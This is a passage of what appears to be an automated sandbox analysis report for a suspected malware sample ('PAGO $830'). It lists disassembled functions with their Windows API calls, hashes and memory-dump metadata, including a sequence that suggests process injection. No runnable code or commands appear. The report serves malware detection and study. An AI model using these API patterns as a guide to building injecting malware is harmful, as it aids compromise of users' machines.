13c079d 1970->1972 1973 13c0771-13c079b 1970->1973 1972->1968 1973->1972 1974->1903 1976 13c0818-13c081b 1975->1976 1977 13c0822-13c0826 1975->1977 1976->1977 1979 13c0828-13c082b 1977->1979 1980 13c0832-13c0836 1977->1980 1979->1980 1981 13c0838-13c083b 1980->1981 1982 13c0842-13c0846 1980->1982 1981->1982 1983 13c0848-13c084e call 13c1758 1982->1983 1984 13c0853-13c085c 1982->1984 1983->1984 1984->1887 1984->1903
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 013C04B3
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013C0549
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013C056B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                          • Instruction ID: aaa5fb9191f575636bde592e3a5d28d9305cc78e040c70ef8217de6da2f692af
                                                          • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                          • Instruction Fuzzy Hash: 39621A34A14258DBEB24CFA4C840BDEB776EF58704F1091A9E20DEB390E7759E81CB59
                                                          Function 00D757AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DB40D9
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D7588F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                          • String ID: Line:
                                                          • API String ID: 2289894680-1585850449
                                                          • Opcode ID: a3e7f16cbba2e10fde25a3828fba37fe73ebaee255ee6b9b2cad2a586ef1268f
                                                          • Instruction ID: 72e71264cafffdafb858d2b5a6b242eb3297f884243a4d254f355d5717e85083
                                                          • Opcode Fuzzy Hash: a3e7f16cbba2e10fde25a3828fba37fe73ebaee255ee6b9b2cad2a586ef1268f
                                                          • Instruction Fuzzy Hash: AD31C271408304AFC720EB20EC45BDB77D8EB55710F14892EF69992092EBB09689CBB3
                                                          Function 00D8FD5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00D905E8
                                                            • Part of subcall function 00D93234: RaiseException.KERNEL32(?,?,?,00D9060A,?,00000001,?,?,?,?,?,?,00D9060A,?,00E38748), ref: 00D93294
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00D90605
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID: Unknown exception
                                                          • API String ID: 3476068407-410509341
                                                          • Opcode ID: a58f10dffa63a5b3340a1f74cc59922aa96929bc0d819fcabfe325420e4bf32e
                                                          • Instruction ID: 3ec9f1a1877f68792db737f69e32b595d103633cd9fe25dec00bb03ea40bd7bc
                                                          • Opcode Fuzzy Hash: a58f10dffa63a5b3340a1f74cc59922aa96929bc0d819fcabfe325420e4bf32e
                                                          • Instruction Fuzzy Hash: 74F0622490030DBBCF54B764E846D9E7F6C9E00710B644571B924E6492EB71DA56CAF4
                                                          Function 00DE2F35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DE2F4D
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DE2F62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 03598b74687256107980a2315556f19e8c98795b764ece90632787f74d3fcb76
                                                          • Instruction ID: b1bb78117a44fc0548201670e9e8b1512e63724cd9ce27d9451a1c432b4bb8d0
                                                          • Opcode Fuzzy Hash: 03598b74687256107980a2315556f19e8c98795b764ece90632787f74d3fcb76
                                                          • Instruction Fuzzy Hash: 7FD05E72500328BBDA60A7A59C0EFCB3A6CDB04750F1002A1B655F20E1DAB0A988CAA0
                                                          Function 00DF7E80 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DF821C
                                                          • TerminateProcess.KERNEL32(00000000), ref: 00DF8223
                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DF8404
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                          • String ID:
                                                          • API String ID: 146820519-0
                                                          • Opcode ID: 2dc2a5d03a030e769d9ccf3ba14a1a3e2305bc3c3c38226bee78ce7b64d2ef2e
                                                          • Instruction ID: 0e1690362a5dd6433d65c7dcdb9b1bdf380290ae80446c2993197ce490d87469
                                                          • Opcode Fuzzy Hash: 2dc2a5d03a030e769d9ccf3ba14a1a3e2305bc3c3c38226bee78ce7b64d2ef2e
                                                          • Instruction Fuzzy Hash: 97127D71A083459FC714DF28C484B6ABBE5FF88314F09C95DE9898B352DB31E945CBA2
                                                          Function 00DA5A39 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dde6b6f947feff12976ecdd74db1a49ceed3148584b40fe4234affee06505ac0
                                                          • Instruction ID: f59d9ba0c85ac904493bb45912b5bd032c181ef4ebb468f9ef4a698964037396
                                                          • Opcode Fuzzy Hash: dde6b6f947feff12976ecdd74db1a49ceed3148584b40fe4234affee06505ac0
                                                          • Instruction Fuzzy Hash: 0D51B275E01609AFCF10AFA9E845FAEBBB4EF47324F180159F404A7295D7749901CB71
                                                          Function 00D729FE Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D734FF
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D73507
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D73512
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D7351D
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D73525
                                                            • Part of subcall function 00D734CE: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7352D
                                                            • Part of subcall function 00D73455: RegisterWindowMessageW.USER32(00000004,?,00D72BCF), ref: 00D734AD
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D72C75
                                                          • OleInitialize.OLE32 ref: 00D72C93
                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00DB3037
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID:
                                                          • API String ID: 1986988660-0
                                                          • Opcode ID: 6ba78bfa906b9cf968be06b794ebe61e542e8c40d5af3d66ca811ae841c7b682
                                                          • Instruction ID: 15920a8237325d0c8d2cef25389941c30a8cb7fcefca93f3b958c4b4a4a81d8f
                                                          • Opcode Fuzzy Hash: 6ba78bfa906b9cf968be06b794ebe61e542e8c40d5af3d66ca811ae841c7b682
                                                          • Instruction Fuzzy Hash: 6E7183B89113408ECB88DF7BE9466953AE0F7CA34475492EAD01AF7261E73844CACF65
                                                          Function 00DA864E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNELBASE(00000000,00000000,?,?,00DA856C,?,00E38CD8,0000000C), ref: 00DA86A4
                                                          • GetLastError.KERNEL32(?,00DA856C,?,00E38CD8,0000000C), ref: 00DA86AE
                                                          • __dosmaperr.LIBCMT ref: 00DA86D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2583163307-0
                                                          • Opcode ID: 1537165816ee2496eb840b640188896eb96e417ba4b77ac8cbf0724e1d7778aa
                                                          • Instruction ID: df5002d1be989cc2d81cbf3cc23c8b0a8f72b32fa9e6a295f44ab6d806c9f503
                                                          • Opcode Fuzzy Hash: 1537165816ee2496eb840b640188896eb96e417ba4b77ac8cbf0724e1d7778aa
                                                          • Instruction Fuzzy Hash: 7301D633A046602EF7282334A845B7E67499B93B74F3D0269FD199B1D2DEB1DC85A1B0
                                                          Function 00DE2EF6 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DE2BF2,?,?,?,00000004,00000001), ref: 00DE2F10
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DE2BF2,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2F24
                                                          • CloseHandle.KERNEL32(00000000,?,00DE2BF2,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2F2B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: c956b377b77cf28ab47c2f901724df4e61f2c9aa21030a24a25171cce72a1210
                                                          • Instruction ID: f5eb14715d9c0e2653edad3436de59bb7207ee79da717d2361bd9a36968b8168
                                                          • Opcode Fuzzy Hash: c956b377b77cf28ab47c2f901724df4e61f2c9aa21030a24a25171cce72a1210
                                                          • Instruction Fuzzy Hash: 7BE086322812147BD6312757AC0EF8B3A2CDB86B75F244310FB58750D086A2154542A8
                                                          Function 00D82C10 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 00D830F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: CALL
                                                          • API String ID: 1385522511-4196123274
                                                          • Opcode ID: 4299a5cd9ac28f41d87c5924b0ce4d0e27f50961b1d231d60b41fe43fd4621ac
                                                          • Instruction ID: 8fdde4494ea180ad7435e73c06346de8dae585097459e9eeed118080c9dae1fe
                                                          • Opcode Fuzzy Hash: 4299a5cd9ac28f41d87c5924b0ce4d0e27f50961b1d231d60b41fe43fd4621ac
                                                          • Instruction Fuzzy Hash: 19226A706083429FC714EF14C884B2ABBF1FF85314F18895DF59A9B2A1D771E945CBA2
                                                          Function 00DE6E0F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00DE6E89
                                                            • Part of subcall function 00D7686D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7689F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad_wcslen
                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                          • API String ID: 3312870042-2806939583
                                                          • Opcode ID: 5a8b7387c47b6999be2ffd5902003d55222c990d8195a3bcb0aa8c260dba3fbb
                                                          • Instruction ID: 1809a02b943437ab9bb7e1e9c928cb8ae6dcf8aca6edbb61741851dc88374254
                                                          • Opcode Fuzzy Hash: 5a8b7387c47b6999be2ffd5902003d55222c990d8195a3bcb0aa8c260dba3fbb
                                                          • Instruction Fuzzy Hash: 43B18F311087418FCB14EF21C89196EB7E5EF94350F44885DF89A972A2EB70ED49CBB2
                                                          Function 00D7480E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00DB386E
                                                            • Part of subcall function 00D7592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D75922,?,?,00D748AA,?,?,?,00000000), ref: 00D7594D
                                                            • Part of subcall function 00D747D0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D747EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen
                                                          • String ID: X
                                                          • API String ID: 779396738-3081909835
                                                          • Opcode ID: ea15c5ed845d72cfce4aa155f08663d2b58c6e9f6740bfc9ee5675c53f1887ca
                                                          • Instruction ID: 31c32b88ba39e782812f51861ace0dd97d9ae87d949b3259d097623d3f747c64
                                                          • Opcode Fuzzy Hash: ea15c5ed845d72cfce4aa155f08663d2b58c6e9f6740bfc9ee5675c53f1887ca
                                                          • Instruction Fuzzy Hash: B8218171A00298AEDB019F94D805BEE7BF9AF49314F008059E519B7241EBB49A89CF71
                                                          Function 00D756C2 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D75793
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_
                                                          • String ID:
                                                          • API String ID: 1144537725-0
                                                          • Opcode ID: afc0bb817f90a3cae7f1c0cec9cc67e2f50b3c84d886891907fec49e0888baa9
                                                          • Instruction ID: 5827febec613d4c762d94c39edfec9ed1c24e47e712387fedb2a78acac131136
                                                          • Opcode Fuzzy Hash: afc0bb817f90a3cae7f1c0cec9cc67e2f50b3c84d886891907fec49e0888baa9
                                                          • Instruction Fuzzy Hash: 06319E74504701CFD720EF35E884797BBE8FB49708F04092EE5DA93240E7B1A988CBA2
                                                          Function 00D7368B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00D736AD
                                                            • Part of subcall function 00D73656: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D7366B
                                                            • Part of subcall function 00D73656: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D73682
                                                            • Part of subcall function 00D7445D: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D736D8,?), ref: 00D7448D
                                                            • Part of subcall function 00D7445D: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D736D8,?), ref: 00D744A0
                                                            • Part of subcall function 00D7445D: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E41418,00E41400,?,?,?,?,?,?,00D736D8,?), ref: 00D74515
                                                            • Part of subcall function 00D7445D: SetCurrentDirectoryW.KERNEL32(?,00000001,00E41418,?,?,?,?,?,?,?,00D736D8,?), ref: 00D74596
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00D736E7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                          • String ID:
                                                          • API String ID: 1550534281-0
                                                          • Opcode ID: 6f65156a49e7663a506bc0c21ceea692e022e6ee794512765e8a0c606726ec05
                                                          • Instruction ID: f2f270163831231442185464c01ba4ec1dfaa8b12793b5185d5c4e93b446762a
                                                          • Opcode Fuzzy Hash: 6f65156a49e7663a506bc0c21ceea692e022e6ee794512765e8a0c606726ec05
                                                          • Instruction Fuzzy Hash: 84F0BE39554344AFEB006FA2FC0BB2937A4E702B05F048546F208795E3EBB2909A9B60
                                                          Function 013BFCF5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 013C04B3
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013C0549
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013C056B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                          • Instruction ID: 5eb900dfd5a16f462fc755d2c5b4fb03231fb642aa3dce135c7f76df449f2b02
                                                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                          • Instruction Fuzzy Hash: CA12DE24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A
                                                          Function 00D8FBF0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: c50e4c454dbe61f9717a30b72fe5b9e64c147048fafdcfc584d061d6d770307a
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: 9731E971A00109DBC718EF58D4C4969F7A6FF89300B6886A5E849CB755D731EEC1DBE0
                                                          Function 00D7686D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
